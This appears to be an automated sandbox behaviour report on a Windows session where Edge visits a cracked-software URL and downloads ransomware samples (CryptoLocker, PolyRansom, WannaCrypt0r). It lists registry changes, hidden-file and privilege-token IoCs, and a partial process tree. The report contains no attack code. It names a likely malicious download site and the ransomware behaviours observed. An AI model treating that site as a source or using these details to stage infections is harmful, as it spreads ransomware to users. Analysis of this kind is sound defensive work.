Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000850dbb48b018db01d640ea27b918db0102680317d03edb0114000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	msedge.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
5192	reg.exe
7316	reg.exe
7236	reg.exe
8164	reg.exe
8044	reg.exe
7512	reg.exe
7396	reg.exe
5312	reg.exe
7968	reg.exe
3644	reg.exe
4948	reg.exe
6708	reg.exe
6996	reg.exe
7728	reg.exe
7252	reg.exe
6672	reg.exe
6808	reg.exe
7832	reg.exe
7904	reg.exe
7536	reg.exe
6332	reg.exe
7592	reg.exe
7580	reg.exe
7484	reg.exe
7116	reg.exe
7668	reg.exe
7376	reg.exe
6832	reg.exe
6412	reg.exe
7672	reg.exe
8000	reg.exe
6340	reg.exe
6808	reg.exe
6996	reg.exe
5496	reg.exe
7552	reg.exe
6400	reg.exe
1144	reg.exe
7452	reg.exe
7184	reg.exe
7312	reg.exe
7252	reg.exe
7216	reg.exe
7668	reg.exe
7828	reg.exe
540	reg.exe
7108	reg.exe
8080	reg.exe
6840	reg.exe
6720	reg.exe
6272	reg.exe
3164	reg.exe
6396	reg.exe
7892	reg.exe
7904	reg.exe
3256	reg.exe
6832	reg.exe
8040	reg.exe
8024	reg.exe
6708	reg.exe
7696	reg.exe
6660	reg.exe
8104	reg.exe
7312	reg.exe

NTFS ADS 10 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 117659.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 977836.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\CryptoLocker.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe\:SmartScreen:$DATA	CryptoLocker.exe
File created	C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe\:Zone.Identifier:$DATA	CryptoLocker.exe
File opened for modification	C:\Users\Admin\Downloads\PolyRansom.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\!!@$ε†μρ_P!@SS_90980+_✥Ke¥✥CC!!!!CC✥C.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 276746.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCrypt0r.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 787613.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4696	msedge.exe
4696	msedge.exe
4884	msedge.exe
4884	msedge.exe
244	msedge.exe
244	msedge.exe
3168	identity_helper.exe
3168	identity_helper.exe
3068	msedge.exe
3068	msedge.exe
1500	msedge.exe
1500	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
2224	msedge.exe
656	msedge.exe
656	msedge.exe
2368	msedge.exe
2368	msedge.exe
1924	msedge.exe
1968	msedge.exe
1968	msedge.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
464	taskhsvc.exe
8124	msedge.exe
8124	msedge.exe
8068	PolyRansom.exe
8068	PolyRansom.exe
8068	PolyRansom.exe
8068	PolyRansom.exe
7500	PolyRansom.exe
7500	PolyRansom.exe
7500	PolyRansom.exe
7500	PolyRansom.exe
6768	PolyRansom.exe
6768	PolyRansom.exe
6768	PolyRansom.exe
6768	PolyRansom.exe
7408	PolyRansom.exe
7408	PolyRansom.exe
7408	PolyRansom.exe
7408	PolyRansom.exe
7568	PolyRansom.exe
7568	PolyRansom.exe
7568	PolyRansom.exe
7568	PolyRansom.exe
7892	PolyRansom.exe
7892	PolyRansom.exe
7892	PolyRansom.exe
7892	PolyRansom.exe
396	PolyRansom.exe
396	PolyRansom.exe
396	PolyRansom.exe
396	PolyRansom.exe
6328	PolyRansom.exe
6328	PolyRansom.exe
6328	PolyRansom.exe
6328	PolyRansom.exe
6768	PolyRansom.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1500	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	980	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	980	AUDIODG.EXE
Token: 33	1204	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1204	AUDIODG.EXE
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: 33	4604	msedge.exe
Token: SeIncBasePriorityPrivilege	4604	msedge.exe
Token: SeIncreaseQuotaPrivilege	8072	WMIC.exe
Token: SeSecurityPrivilege	8072	WMIC.exe
Token: SeTakeOwnershipPrivilege	8072	WMIC.exe
Token: SeLoadDriverPrivilege	8072	WMIC.exe
Token: SeSystemProfilePrivilege	8072	WMIC.exe
Token: SeSystemtimePrivilege	8072	WMIC.exe
Token: SeProfSingleProcessPrivilege	8072	WMIC.exe
Token: SeIncBasePriorityPrivilege	8072	WMIC.exe
Token: SeCreatePagefilePrivilege	8072	WMIC.exe
Token: SeBackupPrivilege	8072	WMIC.exe
Token: SeRestorePrivilege	8072	WMIC.exe
Token: SeShutdownPrivilege	8072	WMIC.exe
Token: SeDebugPrivilege	8072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8072	WMIC.exe
Token: SeRemoteShutdownPrivilege	8072	WMIC.exe
Token: SeUndockPrivilege	8072	WMIC.exe
Token: SeManageVolumePrivilege	8072	WMIC.exe
Token: 33	8072	WMIC.exe
Token: 34	8072	WMIC.exe
Token: 35	8072	WMIC.exe
Token: 36	8072	WMIC.exe
Token: SeTcbPrivilege	8104	taskse.exe
Token: SeIncreaseQuotaPrivilege	8072	WMIC.exe
Token: SeSecurityPrivilege	8072	WMIC.exe
Token: SeTakeOwnershipPrivilege	8072	WMIC.exe
Token: SeLoadDriverPrivilege	8072	WMIC.exe
Token: SeSystemProfilePrivilege	8072	WMIC.exe
Token: SeSystemtimePrivilege	8072	WMIC.exe
Token: SeProfSingleProcessPrivilege	8072	WMIC.exe
Token: SeIncBasePriorityPrivilege	8072	WMIC.exe
Token: SeCreatePagefilePrivilege	8072	WMIC.exe
Token: SeBackupPrivilege	8072	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
1500	msedge.exe
656	msedge.exe
6428	MiniSearchHost.exe
7676	@[email protected]
7676	@[email protected]
7760	@[email protected]
7760	@[email protected]
8112	@[email protected]
8112	@[email protected]
5180	@[email protected]
7424	@[email protected]
840	@[email protected]
6728	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4884 wrote to memory of 1944	4884	msedge.exe	79
PID 4884 wrote to memory of 1944	4884	msedge.exe	79
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 2880	4884	msedge.exe	81
PID 4884 wrote to memory of 4696	4884	msedge.exe	82
PID 4884 wrote to memory of 4696	4884	msedge.exe	82
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83
PID 4884 wrote to memory of 2788	4884	msedge.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4592	attrib.exe
6328	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://getintopc.io/forza-horizon-5-license-key-apk/
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe34b63cb8,0x7ffe34b63cc8,0x7ffe34b63cd8
  2⤵
  PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2
  2⤵
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
